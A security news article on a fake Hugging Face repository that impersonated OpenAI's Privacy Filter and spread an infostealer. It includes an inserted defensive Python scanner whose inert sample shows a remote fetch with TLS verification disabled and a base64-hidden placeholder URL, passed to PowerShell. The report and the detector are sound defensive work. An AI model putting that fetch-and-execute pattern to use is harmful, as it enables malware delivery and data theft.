Fake OpenAI Privacy Filter Repo Reaches #1 on Hugging Face, Spreads Info-Stealing Malware
A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter model reached the platform’s top trending position and exposed thousands of users to a Rust-based information stealer targeting Windows systems.

Fake Repository Exploits Trust in OpenAI
Cybercriminals are now targeting the AI and open-source ecosystem by abusing trust.
A fake Hugging Face project pretending to be OpenAI’s Privacy Filter model recently reached the platform’s #1 trending position. It reportedly gained nearly 244,000 downloads in just 18 hours.
However, instead of providing a privacy-focused AI model, the repository delivered a powerful Rust-based information stealer designed for Windows users.
The malicious project used the name Open-OSS/privacy-filter. It closely copied OpenAI’s legitimate repository called openai/privacy-filter.
Attackers duplicated the project description almost word for word. As a result, many developers and researchers believed the repository was genuine.
What Is OpenAI’s Privacy Filter Model?
OpenAI introduced Privacy Filter in April 2026 as an open-weight model.
Its main purpose was to detect and remove personally identifiable information (PII) from unstructured text. This helps organizations improve privacy protection inside AI systems and business workflows.
Because the project came from a trusted source, many users searched for it quickly after release.
Attackers used that trust as their entry point.
How the Malware Infection Worked
The fake repository instructed users to clone the project and run a Windows batch file called start.bat.
It also provided a Python script called loader.py for Linux and macOS users.
Once launched, the Python script disabled SSL verification and decoded a hidden external URL. It then fetched a command and passed it to PowerShell for execution.
This triggered the next stage of the attack.
The PowerShell command downloaded another batch file from a remote server. That script asked for elevated privileges using a User Account Control prompt.
It also added Microsoft Defender exclusions, downloaded another malicious file, and created a scheduled task to launch the final payload.
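As an added example (not code from the article, the repository or the researchers who analysed the campaign), a small Python triage script that statically flags the loader.py behaviours described above, so a cloned repository's scripts can be checked before anyone runs them; the two embedded samples are constructed, the encoded URL is a placeholder, and the indicator names and `verdict` thresholds are this example's own heuristics.

```python
import ast

def _dotted(node):
    # 'a.b.c' for an Attribute/Name chain, '' for anything else (calls, subscripts, ...)
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else ""

def scan_loader(source):
    """Statically flag the loader.py indicators described in the article; source is parsed, never run."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign) and any(
                _dotted(t) == "ssl._create_default_https_context" for t in node.targets):
            findings.add("ssl_verification_disabled")  # default TLS context replaced
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if any(k.arg == "verify" and isinstance(k.value, ast.Constant) and k.value.value is False
               for k in node.keywords):
            findings.add("ssl_verification_disabled")  # requests.get(..., verify=False)
        if name.endswith("b64decode"):
            findings.add("encoded_payload_decoded")  # URL or command hidden in base64
        if name in ("urllib.request.urlopen", "requests.get", "requests.post"):
            findings.add("remote_fetch")  # weak alone, strong next to an execution sink
        if name.startswith(("subprocess.", "os.system", "os.popen")):
            if any(isinstance(s, ast.Constant) and isinstance(s.value, str)
                   and "powershell" in s.value.lower() for s in ast.walk(node)):
                findings.add("powershell_execution")
    return findings

def verdict(findings):
    # 'high' when fetched content reaches PowerShell; 'medium' for two or more indicators
    if {"remote_fetch", "powershell_execution"} <= findings:
        return "high"
    return "medium" if len(findings) >= 2 else "low"

# Constructed, inert sample mirroring the described chain: it is only parsed, never executed,
# and the encoded URL is a placeholder rather than a real indicator.
SUSPICIOUS = """
import ssl, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
cmd = urllib.request.urlopen(base64.b64decode("<ENCODED_URL_PLACEHOLDER>").decode()).read().decode()
subprocess.run(["powershell", "-Command", cmd])
"""
# Constructed benign sample: fetches a config file over verified TLS and parses it.
BENIGN = """
import json, requests
config = json.loads(requests.get("https://example.invalid/config.json", timeout=10).text)
"""
```

Run `scan_loader` over every `.py` file in a freshly cloned model repository and treat any `high` verdict as a stop signal before `start.bat`, `loader.py` or anything else is executed.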
Final Payload Focused on Data Theft
The final stage was a sophisticated information stealer.
It captured screenshots and collected sensitive data from Discord, cryptocurrency wallets, browser extensions, and FileZilla configurations.
It also searched for wallet seed phrases and stole browser data from Chromium- and Gecko-based browsers.
Additionally, it gathered system information and attempted to disable AMSI and Event Tracing for Windows.
These actions helped the malware avoid detection.
Interestingly, the malware did not create long-term persistence. Instead, it used the scheduled task as a one-time SYSTEM-level launcher.
This method made detection harder while reducing obvious warning signs.
More Repositories and Possible ValleyRAT Links
Researchers also found six more repositories using similar Python loaders.
This suggests the campaign was not a single isolated attack.
Shared infrastructure also connected the activity to ValleyRAT, also known as Winos 4.0.
ValleyRAT is a modular remote access trojan linked to the Chinese threat group Silver Fox.
This connection raises concerns about a larger supply chain attack targeting open-source ecosystems and AI platforms.
Why CISOs Should Pay Attention
This incident shows a major shift in supply chain security risks.
Many organizations focus on securing code libraries and software packages. However, attackers are now targeting AI model repositories as well.
For CISOs and security leaders, this is a serious warning.
Model repositories must receive the same security checks as software dependencies.
Verification, repository trust validation, sandbox testing, and strong endpoint protection are now essential controls.
As AI adoption grows across UAE enterprises and global organizations, governance around third-party AI assets becomes even more important.
Trust is now part of the attack surface.